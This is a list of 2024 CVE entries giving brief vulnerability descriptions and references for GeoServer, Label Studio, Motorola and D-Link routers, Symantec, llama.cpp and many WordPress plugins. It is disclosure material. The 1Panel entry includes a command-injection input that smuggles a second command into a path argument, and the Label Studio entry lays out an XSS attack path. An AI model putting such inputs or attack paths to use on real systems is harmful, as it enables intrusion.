CVE    2024    23634    Candidate    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. An arbitrary file renaming vulnerability exists in versions prior to 2.23.5 and 2.24.2 that enables an authenticated administrator with permissions to modify stores through the REST Coverage Store or Data Store API to rename arbitrary files and directories with a name that does not end in `.zip`. Store file uploads rename zip files to have a `.zip` extension if it doesn't already have one before unzipping the file. This is fine for file and url upload methods where the files will be in a specific subdirectory of the data directory but, when using the external upload method, this allows arbitrary files and directories to be renamed. Renaming GeoServer files will most likely result in a denial of service, either completely preventing GeoServer from running or effectively deleting specific resources (such as a workspace, layer or style). In some cases, renaming GeoServer files could revert to the default settings for that file which could be relatively harmless like removing contact information or have more serious consequences like allowing users to make OGC requests that the customized settings would have prevented them from making. The impact of renaming non-GeoServer files depends on the specific environment although some sort of denial of service is a likely outcome. Versions 2.23.5 and 2.24.2 contain a fix for this issue.    MISC:https://github.com/geoserver/geoserver/commit/5d6af2f8ba9ad7dffae59575504a867159698772   |   URL:https://github.com/geoserver/geoserver/commit/5d6af2f8ba9ad7dffae59575504a867159698772   |   MISC:https://github.com/geoserver/geoserver/commit/c37f58fbacdfa0d581a6f99195585f70b1201f0a   |   URL:https://github.com/geoserver/geoserver/commit/c37f58fbacdfa0d581a6f99195585f70b1201f0a   |   MISC:https://github.com/geoserver/geoserver/pull/7289   |   URL:https://github.com/geoserver/geoserver/pull/7289   |   MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-75m5-hh4r-q9gx   |   URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-75m5-hh4r-q9gx   |   MISC:https://osgeo-org.atlassian.net/browse/GEOS-11213   |   URL:https://osgeo-org.atlassian.net/browse/GEOS-11213    Assigned (20240119)
CVE    2024    23633    Candidate    Label Studio, an open source data labeling tool, had a remote import feature that allowed users to import data from a remote web source, which was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could have been abused to download an HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. `data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py` lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import a `.html` file that would execute JavaScript when visited. Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page's actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded.    MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox   |   URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox   |   MISC:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62   |   URL:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62   |   MISC:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146   |   URL:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146   |   MISC:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r   |   URL:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r    Assigned (20240119)
CVE    2024    23630    Candidate    An arbitrary firmware upload vulnerability exists in the Motorola MR2600. An attacker can exploit this vulnerability to achieve code execution on the device. Authentication is required, but it can be bypassed.    MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-arbitrary-firmware-upload-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-arbitrary-firmware-upload-vulnerability/    Assigned (20240118)
CVE    2024    2363    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in AOL AIM Triton 1.0.4. It has been declared as problematic. This vulnerability affects unknown code of the component Invite Handler. The manipulation of the argument CSeq leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256318 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.    MISC:VDB-256318 | AOL AIM Triton Invite denial of service   |   URL:https://vuldb.com/?id.256318   |   MISC:VDB-256318 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256318   |   MISC:https://fitoxs.com/vuldb/exploit/exploit_aim_triton.txt   |   URL:https://fitoxs.com/vuldb/exploit/exploit_aim_triton.txt    Assigned (20240310)
CVE    2024    23629    Candidate    An authentication bypass vulnerability exists in the web component of the Motorola MR2600. An attacker can exploit this vulnerability to access protected URLs and retrieve sensitive information.    MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-authentication-bypass-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-authentication-bypass-vulnerability/    Assigned (20240118)
CVE    2024    23628    Candidate    A command injection vulnerability exists in the 'SaveStaticRouteIPv6Params' parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, but it can be bypassed.    MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv6params-command-injection-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv6params-command-injection-vulnerability/    Assigned (20240118)
CVE    2024    23627    Candidate    A command injection vulnerability exists in the 'SaveStaticRouteIPv4Params' parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, but it can be bypassed.    MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv4params-command-injection-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv4params-command-injection-vulnerability/    Assigned (20240118)
CVE    2024    23626    Candidate    A command injection vulnerability exists in the ‘SaveSysLogParams’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, but it can be bypassed.    MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savesyslogparams-command-injection-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savesyslogparams-command-injection-vulnerability/    Assigned (20240118)
CVE    2024    23625    Candidate    A command injection vulnerability exists in D-Link DAP-1650 devices when handling UPnP SUBSCRIBE messages. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root.    MISC:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-subscribe-callback-command-injection-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-subscribe-callback-command-injection-vulnerability/    Assigned (20240118)
CVE    2024    23624    Candidate    A command injection vulnerability exists in the gena.cgi module of D-Link DAP-1650 devices. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root.    MISC:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-gena-cgi-subscribe-command-injection-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-gena-cgi-subscribe-command-injection-vulnerability/    Assigned (20240118)
CVE    2024    23622    Candidate    A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges.    MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-copysls_request3-buffer-overflow/   |   URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-copysls_request3-buffer-overflow/    Assigned (20240118)
CVE    2024    23621    Candidate    A buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution.    MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-buffer-overflow/   |   URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-buffer-overflow/    Assigned (20240118)
CVE    2024    23620    Candidate    An improper privilege management vulnerability exists in IBM Merge Healthcare eFilm Workstation. A local, authenticated attacker can exploit this vulnerability to escalate privileges to SYSTEM.    MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-system-privilege-escalation/   |   URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-system-privilege-escalation/    Assigned (20240118)
CVE    2024    23619    Candidate    A hardcoded credential vulnerability exists in IBM Merge Healthcare eFilm Workstation. A remote, unauthenticated attacker can exploit this vulnerability to achieve information disclosure or remote code execution.    MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-information-disclosure/   |   URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-information-disclosure/    Assigned (20240118)
CVE    2024    23618    Candidate    An arbitrary code execution vulnerability exists in Arris SURFboard SBG6950AC2 devices. An unauthenticated attacker can exploit this vulnerability to achieve code execution as root.    MISC:https://blog.exodusintel.com/2024/01/25/arris-surfboard-sbg6950ac2-arbitrary-command-execution-vulnerability/   |   URL:https://blog.exodusintel.com/2024/01/25/arris-surfboard-sbg6950ac2-arbitrary-command-execution-vulnerability/    Assigned (20240118)
CVE    2024    23617    Candidate    A buffer overflow vulnerability exists in Symantec Data Loss Prevention version 14.0.2 and before. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted document to achieve code execution.    MISC:https://blog.exodusintel.com/2024/01/25/symantec-data-loss-prevention-wp6sr-dll-stack-buffer-overflow-remote-code-execution/   |   URL:https://blog.exodusintel.com/2024/01/25/symantec-data-loss-prevention-wp6sr-dll-stack-buffer-overflow-remote-code-execution/    Assigned (20240118)
CVE    2024    23616    Candidate    A buffer overflow vulnerability exists in Symantec Server Management Suite version 7.9 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM.    MISC:https://blog.exodusintel.com/2024/01/25/symantec-server-management-suite-axengine-exe-buffer-overflow-remote-code-execution/   |   URL:https://blog.exodusintel.com/2024/01/25/symantec-server-management-suite-axengine-exe-buffer-overflow-remote-code-execution/    Assigned (20240118)
CVE    2024    23615    Candidate    A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 10.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root.    MISC:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-libdec2lha-so-stack-buffer-overflow-remote-code-execution/   |   URL:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-libdec2lha-so-stack-buffer-overflow-remote-code-execution/    Assigned (20240118)
CVE    2024    23614    Candidate    A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 9.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root.    MISC:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-stack-buffer-overflow-remote-code-execution/   |   URL:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-stack-buffer-overflow-remote-code-execution/    Assigned (20240118)
CVE    2024    23613    Candidate    A buffer overflow vulnerability exists in Symantec Deployment Solution version 7.9 when parsing UpdateComputer tokens. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM.    MISC:https://blog.exodusintel.com/2024/01/25/symantec-deployment-solution-axengine-exe-buffer-overflow-remote-code-execution   |   URL:https://blog.exodusintel.com/2024/01/25/symantec-deployment-solution-axengine-exe-buffer-overflow-remote-code-execution    Assigned (20240118)
CVE    2024    23612    Candidate    An improper error handling vulnerability in LabVIEW may result in remote code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions.    MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/improper-error-handling-issues-in-labview.html   |   URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/improper-error-handling-issues-in-labview.html    Assigned (20240118)
CVE    2024    23611    Candidate    An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions.    MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/out-of-bounds-write-due-to-missing-bounds-check-in-labview.html   |   URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/out-of-bounds-write-due-to-missing-bounds-check-in-labview.html    Assigned (20240118)
CVE    2024    23607    Candidate    A directory traversal vulnerability exists in the F5OS QKView utility that allows an authenticated attacker to read files outside the QKView directory. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.    MISC:https://my.f5.com/manage/s/article/K000132800   |   URL:https://my.f5.com/manage/s/article/K000132800    Assigned (20240201)
CVE    2024    23606    Candidate    An out-of-bounds write vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1925   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1925    Assigned (20240123)
CVE    2024    23605    Candidate    A heap-based buffer overflow vulnerability exists in the GGUF library header.n_kv functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1916   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1916    Assigned (20240118)
CVE    2024    23604    Candidate    Cross-site scripting vulnerability exists in FitNesse all releases, which may allow a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is using the product and accessing a link with specially crafted multiple parameters.    MISC:http://fitnesse.org/FitNesseDownload   |   URL:http://fitnesse.org/FitNesseDownload   |   MISC:https://github.com/unclebob/fitnesse   |   URL:https://github.com/unclebob/fitnesse   |   MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   MISC:https://jvn.jp/en/jp/JVN94521208/   |   URL:https://jvn.jp/en/jp/JVN94521208/    Assigned (20240306)
CVE    2024    23603    Candidate    An SQL injection vulnerability exists in an undisclosed page of the BIG-IP Configuration utility. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.    MISC:https://my.f5.com/manage/s/article/K000138047   |   URL:https://my.f5.com/manage/s/article/K000138047    Assigned (20240201)
CVE    2024    23591    Candidate    ThinkSystem SR670V2 servers manufactured from approximately June 2021 to July 2023 were left in Manufacturing Mode which could allow an attacker with privileged logical access to the host or physical access to server internals to modify or disable Intel Boot Guard firmware integrity, SPS security, and other SPS configuration settings. The server’s NIST SP 800-193-compliant Platform Firmware Resiliency (PFR) security subsystem significantly mitigates this issue.    MISC:https://https://support.lenovo.com/us/en/product_security/LEN-150020   |   URL:https://https://support.lenovo.com/us/en/product_security/LEN-150020    Assigned (20240118)
CVE    2024    2357    Candidate    The Libreswan Project was notified of an issue causing libreswan to restart under some IKEv2 retransmit scenarios when a connection is configured to use PreSharedKeys (authby=secret) and the connection cannot find a matching configured secret. When such a connection is automatically added on startup using the auto= keyword, it can cause repeated crashes leading to a Denial of Service.    FEDORA:FEDORA-2024-1439ec2069   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJZJYFHKBIJ4ZK5GAWWFFR3AKJS6O5JX/   |   FEDORA:FEDORA-2024-312a5ed3d5   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HEM46ALKF7NG6CAUKZ7KQERVOHWQIQKY/   |   FEDORA:FEDORA-2024-92f0c71a01   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVQ7MZY6LFFGRWAJNTKKN2VSEFS2VPAR/   |   MISC:CVE-2024-2357   |   URL:https://libreswan.org/security/CVE-2024-2357    Assigned (20240309)
CVE    2024    23553    Candidate    A cross-site scripting (XSS) vulnerability exists in the Web Reports component of HCL BigFix Platform because a specific HTTP header attribute is missing.    MISC:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209   |   URL:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209    Assigned (20240118)
CVE    2024    23550    Candidate    HCL DevOps Deploy / HCL Launch (UCD) could disclose sensitive user information when installing the Windows agent.    MISC:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110334   |   URL:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110334    Assigned (20240118)
CVE    2024    2355    Candidate    A vulnerability has been found in keerti1924 Secret-Coder-PHP-Project 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /secret_coder.sql. The manipulation leads to inclusion of sensitive information in source code. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256315 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256315   |   MISC:VDB-256315 | keerti1924 Secret-Coder-PHP-Project secret_coder.sql inclusion of sensitive information in source code   |   URL:https://vuldb.com/?id.256315   |   MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20Sensitive%20Information%20Disclosure%5D%20on%20secret_coder.sql.md   |   URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20Sensitive%20Information%20Disclosure%5D%20on%20secret_coder.sql.md    Assigned (20240309)
CVE    2024    2354    Candidate    A vulnerability, which was classified as problematic, was found in Dreamer CMS 4.1.3. Affected is an unknown function of the file /admin/menu/toEdit. The manipulation of the argument id leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256314 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256314   |   MISC:VDB-256314 | Dreamer CMS toEdit cross-site request forgery   |   URL:https://vuldb.com/?id.256314   |   MISC:https://github.com/sweatxi/BugHub/blob/main/dreamer_cms_admin_menu_toEdit_csrf.pdf   |   URL:https://github.com/sweatxi/BugHub/blob/main/dreamer_cms_admin_menu_toEdit_csrf.pdf    Assigned (20240309)
CVE    2024    2353    Candidate    A vulnerability, which was classified as critical, has been found in Totolink X6000R 9.4.0cu.852_20230719. This issue affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation of the argument ip leads to OS command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256313 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256313 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256313   |   MISC:VDB-256313 | Totolink X6000R shttpd cstecgi.cgi setDiagnosisCfg os command injection   |   URL:https://vuldb.com/?id.256313   |   MISC:https://github.com/OraclePi/repo/blob/main/totolink%20X6000R/1/X6000R%20AX3000%20WiFi%206%20Giga%20unauthed%20rce.md   |   URL:https://github.com/OraclePi/repo/blob/main/totolink%20X6000R/1/X6000R%20AX3000%20WiFi%206%20Giga%20unauthed%20rce.md    Assigned (20240309)
CVE    2024    23525    Candidate    The Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig.    MISC:https://gist.github.com/phvietan/d1c95a88ab6e17047b0248d6bf9eac4a   |   MISC:https://github.com/MichaelDaum/spreadsheet-parsexlsx/issues/10   |   MISC:https://metacpan.org/release/NUDDLEGG/Spreadsheet-ParseXLSX-0.30/changes   |   MLIST:[debian-lts-announce] 20240127 [SECURITY] [DLA 3723-1] libspreadsheet-parsexlsx-perl security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00018.html   |   MLIST:[oss-security] 20240118 CVE-2024-23525: Spreadsheet::ParseXLSX for Perl is vulnerable to XXE attacks   |   URL:http://www.openwall.com/lists/oss-security/2024/01/18/4    Assigned (20240117)
CVE    2024    23523    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Elementor Pro. This issue affects Elementor Pro: from n/a through 3.19.2.    MISC:https://patchstack.com/database/vulnerability/elementor-pro/wordpress-elementor-pro-plugin-3-19-2-contributor-arbitrary-user-meta-data-retrieval-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/elementor-pro/wordpress-elementor-pro-plugin-3-19-2-contributor-arbitrary-user-meta-data-retrieval-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23520    Candidate    Missing Authorization vulnerability in AccessAlly PopupAlly. This issue affects PopupAlly: from n/a through 2.1.0.    MISC:https://patchstack.com/database/vulnerability/popupally/wordpress-popupally-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/popupally/wordpress-popupally-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    2352    Candidate    A vulnerability, which was classified as critical, has been found in 1Panel up to 1.10.1-lts. Affected by this issue is the function baseApi.UpdateDeviceSwap of the file /api/v1/toolbox/device/update/swap. The manipulation of the argument Path with the input 123123123\nopen -a Calculator leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-256304.    MISC:VDB-256304 | 1Panel swap baseApi.UpdateDeviceSwap command injection   |   URL:https://vuldb.com/?id.256304   |   MISC:VDB-256304 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256304   |   MISC:https://github.com/1Panel-dev/1Panel/pull/4131   |   URL:https://github.com/1Panel-dev/1Panel/pull/4131   |   MISC:https://github.com/1Panel-dev/1Panel/pull/4131#issue-2176105990   |   URL:https://github.com/1Panel-dev/1Panel/pull/4131#issue-2176105990   |   MISC:https://github.com/1Panel-dev/1Panel/pull/4131/commits/0edd7a9f6f5100aab98a0ea6e5deedff7700396c   |   URL:https://github.com/1Panel-dev/1Panel/pull/4131/commits/0edd7a9f6f5100aab98a0ea6e5deedff7700396c    Assigned (20240309)
CVE    2024    23519    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in M&S Consulting Email Before Download. This issue affects Email Before Download: from n/a through 6.9.7.    MISC:https://patchstack.com/database/vulnerability/email-before-download/wordpress-email-before-download-plugin-6-9-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/email-before-download/wordpress-email-before-download-plugin-6-9-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23517    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Start Booking Scheduling Plugin – Online Booking for WordPress allows Stored XSS. This issue affects Scheduling Plugin – Online Booking for WordPress: from n/a through 3.5.10.    MISC:https://patchstack.com/database/vulnerability/calendar-booking/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/calendar-booking/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23516    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Calculators World CC BMI Calculator allows Stored XSS. This issue affects CC BMI Calculator: from n/a through 2.0.1.    MISC:https://patchstack.com/database/vulnerability/cc-bmi-calculator/wordpress-cc-bmi-calculator-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/cc-bmi-calculator/wordpress-cc-bmi-calculator-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23514    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ClickToTweet.Com Click To Tweet allows Stored XSS. This issue affects Click To Tweet: from n/a through 2.0.14.    MISC:https://patchstack.com/database/vulnerability/click-to-tweet/wordpress-click-to-tweet-plugin-2-0-14-cross-site-scripting-xss-vulnerability-2?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/click-to-tweet/wordpress-click-to-tweet-plugin-2-0-14-cross-site-scripting-xss-vulnerability-2?_s_id=cve    Assigned (20240117)
CVE    2024    23513    Candidate    Deserialization of Untrusted Data vulnerability in PropertyHive. This issue affects PropertyHive: from n/a through 2.0.5.    MISC:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-5-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-5-php-object-injection-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23512    Candidate    Deserialization of Untrusted Data vulnerability in wpxpo ProductX – WooCommerce Builder & Gutenberg WooCommerce Blocks. This issue affects ProductX – WooCommerce Builder & Gutenberg WooCommerce Blocks: from n/a through 3.1.4.    MISC:https://patchstack.com/database/vulnerability/product-blocks/wordpress-productx-plugin-3-1-4-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/product-blocks/wordpress-productx-plugin-3-1-4-php-object-injection-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    2351    Candidate    A vulnerability classified as critical was found in CodeAstro Ecommerce Site 1.0. Affected by this vulnerability is an unknown functionality of the file action.php of the component Search. The manipulation of the argument cat_id/brand_id/keyword leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256303.    MISC:VDB-256303 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256303   |   MISC:VDB-256303 | CodeAstro Ecommerce Site Search action.php sql injection   |   URL:https://vuldb.com/?id.256303   |   MISC:https://docs.qq.com/doc/DYklCV0thWnRaaWpY   |   URL:https://docs.qq.com/doc/DYklCV0thWnRaaWpY    Assigned (20240309)
CVE    2024    23508    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins PDF Poster – PDF Embedder Plugin for WordPress allows Reflected XSS. This issue affects PDF Poster – PDF Embedder Plugin for WordPress: from n/a through 2.1.17.    MISC:https://patchstack.com/database/vulnerability/pdf-poster/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pdf-poster/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23507    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration. This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9.    MISC:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sql-injection-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23506    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration. This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9.    MISC:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23505    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DearHive PDF Viewer & 3D PDF Flipbook – DearPDF allows Stored XSS. This issue affects PDF Viewer & 3D PDF Flipbook – DearPDF: from n/a through 2.0.38.    MISC:https://patchstack.com/database/vulnerability/dearpdf-lite/wordpress-pdf-viewer-3d-pdf-flipbook-dearpdf-plugin-2-0-38-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/dearpdf-lite/wordpress-pdf-viewer-3d-pdf-flipbook-dearpdf-plugin-2-0-38-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23502    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in InfornWeb Posts List Designer by Category – List Category Posts Or Recent Posts allows Stored XSS. This issue affects Posts List Designer by Category – List Category Posts Or Recent Posts: from n/a through 3.3.2.    MISC:https://patchstack.com/database/vulnerability/post-list-designer/wordpress-posts-list-designer-by-category-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/post-list-designer/wordpress-posts-list-designer-by-category-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240117)
